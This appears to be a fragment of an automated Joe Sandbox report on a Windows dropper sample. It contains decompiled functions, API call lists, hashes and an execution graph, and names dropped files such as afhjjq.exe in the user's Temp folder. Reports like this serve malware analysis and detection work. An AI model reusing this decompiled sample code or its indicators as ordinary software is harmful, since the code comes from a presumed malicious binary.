				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                            0x00401e4e
                            0x00401e59
                            0x00401e5b
                            0x00401e68
                            0x00401e7f
                            0x00401e84
                            0x00401e91
                            0x00401e96
                            0x00401e9a
                            0x00401ea5
                            0x00401eac
                            0x00401ebe
                            0x00401ec4
                            0x00401ec9
                            0x00401ed3
                            0x00402638
                            0x0040156d
                            0x00402ba4
                            0x00402c2d
                            0x00402c39

                            APIs
                            • GetDC.USER32(?), ref: 00401E51
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                            • ReleaseDC.USER32 ref: 00401E84
                              • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                              • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                            • String ID:
                            • API String ID: 2584051700-0
                            • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                            • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                            • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                            • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 59%
                            			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                            0x00401c43
                            0x00401c45
                            0x00401c4c
                            0x00401c4f
                            0x00401c52
                            0x00401c5c
                            0x00401c60
                            0x00401c63
                            0x00401c6c
                            0x00401c6c
                            0x00401c6f
                            0x00401c73
                            0x00401c7c
                            0x00401c7c
                            0x00401c7f
                            0x00401c83
                            0x00401c85
                            0x00401cda
                            0x00401cdc
                            0x00401ce7
                            0x00401cf1
                            0x00401cf4
                            0x00401cf4
                            0x00401cfd
                            0x00000000
                            0x00401c87
                            0x00401c8e
                            0x00401c90
                            0x00401c93
                            0x00401c99
                            0x00401ca0
                            0x00401ca3
                            0x00401ccb
                            0x00401d03
                            0x00401d03
                            0x00401ca5
                            0x00401cb3
                            0x00401cbb
                            0x00401cbe
                            0x00401cbe
                            0x00401ca3
                            0x00401d06
                            0x00401d09
                            0x00401d0f
                            0x00402ba4
                            0x00402ba4
                            0x00402c2d
                            0x00402c39

                            APIs
                            • SendMessageTimeoutW.USER32 ref: 00401CB3
                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend$Timeout
                            • String ID: !
                            • API String ID: 1777923405-2657877971
                            • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                            • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                            • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                            • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                            0x00406544
                            0x00406546
                            0x0040655b
                            0x0040655e
                            0x00406563
                            0x00406568
                            0x004065a6
                            0x004065a6
                            0x0040656a
                            0x0040657c
                            0x00406587
                            0x0040658d
                            0x00406598
                            0x00000000
                            0x00000000
                            0x00406598
                            0x004065ac

                            APIs
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,?,?,0040679D,80000002), ref: 0040657C
                            • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,"C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq,00000000,00422728), ref: 00406587
                            Strings
                            • ('B, xrefs: 0040655B
                            • "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq, xrefs: 0040653D
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CloseQueryValue
                            • String ID: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq$('B
                            • API String ID: 3356406503-1563722736
                            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                            • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                            • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                            0x00405f38
                            0x00405f45
                            0x00405f46
                            0x00405f51
                            0x00405f59
                            0x00405f59
                            0x00405f61

                            APIs
                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CharPrevlstrcatlstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 2659869361-823278215
                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                            • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                            • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                            0x00405642
                            0x0040564c
                            0x00405668
                            0x0040568a
                            0x0040568d
                            0x00405693
                            0x0040569d
                            0x0040569e
                            0x004056a0
                            0x004056a6
                            0x004056a6
                            0x004056b0
                            0x00000000
                            0x004056be
                            0x00405675
                            0x004056ad
                            0x004056ad
                            0x00000000
                            0x004056ad
                            0x00405681
                            0x00405683
                            0x00000000
                            0x00405683
                            0x00405652
                            0x00000000
                            0x00000000
                            0x00405659
                            0x00000000

                            APIs
                            • IsWindowVisible.USER32 ref: 0040566D
                            • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                              • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Window$CallMessageProcSendVisible
                            • String ID:
                            • API String ID: 3748168415-3916222277
                            • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                            • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                            • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                            • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                            0x004060cd
                            0x004060cf
                            0x004060d2
                            0x004060fe
                            0x004060d7
                            0x004060e0
                            0x004060e5
                            0x004060f0
                            0x004060f3
                            0x0040610f
                            0x004060f5
                            0x004060fc
                            0x00000000
                            0x004060fc
                            0x00406108
                            0x0040610c
                            0x0040610c
                            0x00406106
                            0x00000000

                            APIs
                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                            • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                            • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: lstrlen$CharNextlstrcmpi
                            • String ID:
                            • API String ID: 190613189-0
                            • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                            • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                            • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                            • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:17.7%
                            Dynamic/Decrypted Code Coverage:5.6%
                            Signature Coverage:5.8%
                            Total number of Nodes:1983
                            Total number of Limit Nodes:115
                            execution_graph 7950 1324912 7951 132494e 7950->7951 7953 1324924 7950->7953 7953->7951 7954 1325e1c 7953->7954 7955 1325e28 _doexit 7954->7955 7956 13252a2 __getptd 64 API calls 7955->7956 7957 1325e2d 7956->7957 7960 1329622 7957->7960 7961 1329641 7960->7961 7962 1329648 7960->7962 7963 1322fb4 __NMSG_WRITE 64 API calls 7961->7963 7972 1325ebb 7962->7972 7963->7962 7966 1329659 _memset 7968 1329731 7966->7968 7971 13296f1 SetUnhandledExceptionFilter UnhandledExceptionFilter 7966->7971 7996 1322f32 7968->7996 7971->7968 7973 1325056 __decode_pointer 6 API calls 7972->7973 7974 1325ec6 7973->7974 7974->7966 7975 1325ec8 7974->7975 7978 1325ed4 _doexit 7975->7978 7976 1325f30 7977 1325f11 7976->7977 7982 1325f3f 7976->7982 7981 1325056 __decode_pointer 6 API calls 7977->7981 7978->7976 7978->7977 7979 1325efb 7978->7979 7983 1325ef7 7978->7983 7980 1325229 __getptd_noexit 64 API calls 7979->7980 7985 1325f00 _siglookup 7980->7985 7981->7985 7984 13231da __mbsnbcmp_l 64 API calls 7982->7984 7983->7979 7983->7982 7986 1325f44 7984->7986 7987 1325fa6 7985->7987 7989 1322f32 _raise 64 API calls 7985->7989 7995 1325f09 _doexit 7985->7995 7988 1323941 __mbsnbcmp_l 6 API calls 7986->7988 7990 1321f64 __lock 64 API calls 7987->7990 7991 1325fb1 7987->7991 7988->7995 7989->7987 7990->7991 7992 132504d __init_pointers 7 API calls 7991->7992 7993 1325fe6 7991->7993 7992->7993 7999 132603c 7993->7999 7995->7966 7997 1322df0 _doexit 64 API calls 7996->7997 7998 1322f43 7997->7998 8000 1326042 7999->8000 8001 1326049 7999->8001 8003 1321e8a LeaveCriticalSection 8000->8003 8001->7995 8003->8001 7943 1321e33 7944 1321e43 7943->7944 7945 1321e67 7944->7945 7946 1321e4f DeleteCriticalSection 7944->7946 7948 1321e79 DeleteCriticalSection 7945->7948 7949 1321e87 7945->7949 7947 132567d __read_nolock 64 API calls 7946->7947 7947->7944 7948->7945 8125 1327170 RtlUnwind 8126 1325d77 8127 1325750 __calloc_crt 64 API calls 8126->8127 8128 1325d83 8127->8128 8129 1324fdb __encode_pointer 7 API calls 8128->8129 8130 1325d8b 8129->8130 8131 1324954 SetUnhandledExceptionFilter 8132 1325655 8133 1325661 SetLastError 8132->8133 8134 1325669 _doexit 8132->8134 8133->8134 8135 132325a 8136 1323267 8135->8136 8137 1325750 __calloc_crt 64 API calls 8136->8137 8138 1323281 8137->8138 8139 1325750 __calloc_crt 64 API calls 8138->8139 8140 132329a 8138->8140 8139->8140 8193 2b14118 8194 2b13844 10 API calls 8193->8194 8195 2b14122 8194->8195 8217 13239f8 8218 1323a0a 8217->8218 8220 1323a18 @_EH4_CallFilterFunc@8 8217->8220 8219 1325b55 __crtLCMapStringA_stat 5 API calls 8218->8219 8219->8220 8004 1329619 8005 1322cac __amsg_exit 64 API calls 8004->8005 8006 1329620 8005->8006 8221 1321dde 8224 1325578 8221->8224 8223 1321de3 8223->8223 8225 13255aa GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 8224->8225 8226 132559d 8224->8226 8227 13255a1 8225->8227 8226->8225 8226->8227 8227->8223 8196 1321d9f 8197 1321db4 8196->8197 8198 1321dae 8196->8198 8202 1322f57 8197->8202 8199 1322f32 _raise 64 API calls 8198->8199 8199->8197 8201 1321db9 _doexit 8203 1322df0 _doexit 64 API calls 8202->8203 8204 1322f62 8203->8204 8204->8201 8145 13252bc 8147 13252c8 _doexit 8145->8147 8146 13252e0 8150 13252ee 8146->8150 8151 132567d __read_nolock 64 API calls 8146->8151 8147->8146 8148 13253ca _doexit 8147->8148 8149 132567d __read_nolock 64 API calls 8147->8149 8149->8146 8152 13252fc 8150->8152 8153 132567d __read_nolock 64 API calls 8150->8153 8151->8150 8154 132530a 8152->8154 8155 132567d __read_nolock 64 API calls 8152->8155 8153->8152 8156 1325318 8154->8156 8157 132567d __read_nolock 64 API calls 8154->8157 8155->8154 8158 1325326 8156->8158 8159 132567d __read_nolock 64 API calls 8156->8159 8157->8156 8160 1325334 8158->8160 8161 132567d __read_nolock 64 API calls 8158->8161 8159->8158 8162 1325345 8160->8162 8163 132567d __read_nolock 64 API calls 8160->8163 8161->8160 8164 1321f64 __lock 64 API calls 8162->8164 8163->8162 8165 132534d 8164->8165 8166 1325372 8165->8166 8167 1325359 InterlockedDecrement 8165->8167 8181 13253d6 8166->8181 8167->8166 8168 1325364 8167->8168 8168->8166 8172 132567d __read_nolock 64 API calls 8168->8172 8171 1321f64 __lock 64 API calls 8173 1325386 8171->8173 8172->8166 8174 1328e80 ___removelocaleref 8 API calls 8173->8174 8180 13253b7 8173->8180 8176 132539b 8174->8176 8179 1328ca8 ___freetlocinfo 64 API calls 8176->8179 8176->8180 8178 132567d __read_nolock 64 API calls 8178->8148 8179->8180 8184 13253e2 8180->8184 8187 1321e8a LeaveCriticalSection 8181->8187 8183 132537f 8183->8171 8188 1321e8a LeaveCriticalSection 8184->8188 8186 13253c4 8186->8178 8187->8183 8188->8186 5927 1321c60 5964 1322a5c 5927->5964 5929 1321c6c GetStartupInfoA 5930 1321c8f 5929->5930 5931 1321cdf 5930->5931 6095 1321c37 5930->6095 5965 13253eb GetModuleHandleW 5931->5965 5935 1321c37 _fast_error_exit 64 API calls 5936 1321cf0 __RTC_Initialize 5935->5936 5999 13243da 5936->5999 5938 1321cfe 5939 1321d0a GetCommandLineA 5938->5939 6103 1322cac 5938->6103 6014 1324e55 5939->6014 5946 1321d2f 6051 1324b22 5946->6051 5947 1322cac __amsg_exit 64 API calls 5947->5946 5950 1321d40 6066 1322d6b 5950->6066 5951 1322cac __amsg_exit 64 API calls 5951->5950 5953 1321d47 5954 1321d52 5953->5954 5955 1322cac __amsg_exit 64 API calls 5953->5955 6072 1324ac3 5954->6072 5955->5954 5960 1321d81 6113 1322f48 5960->6113 5963 1321d86 _doexit 5964->5929 5966 1325406 5965->5966 5967 13253ff 5965->5967 5969 1325410 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5966->5969 5970 132556e 5966->5970 6116 1322c7c 5967->6116 5972 1325459 TlsAlloc 5969->5972 6177 1325105 5970->6177 5975 1321ce5 5972->5975 5976 13254a7 TlsSetValue 5972->5976 5975->5935 5975->5936 5976->5975 5977 13254b8 5976->5977 6120 1322f66 5977->6120 5982 1324fdb __encode_pointer 7 API calls 5983 13254d8 5982->5983 5984 1324fdb __encode_pointer 7 API calls 5983->5984 5985 13254e8 5984->5985 5986 1324fdb __encode_pointer 7 API calls 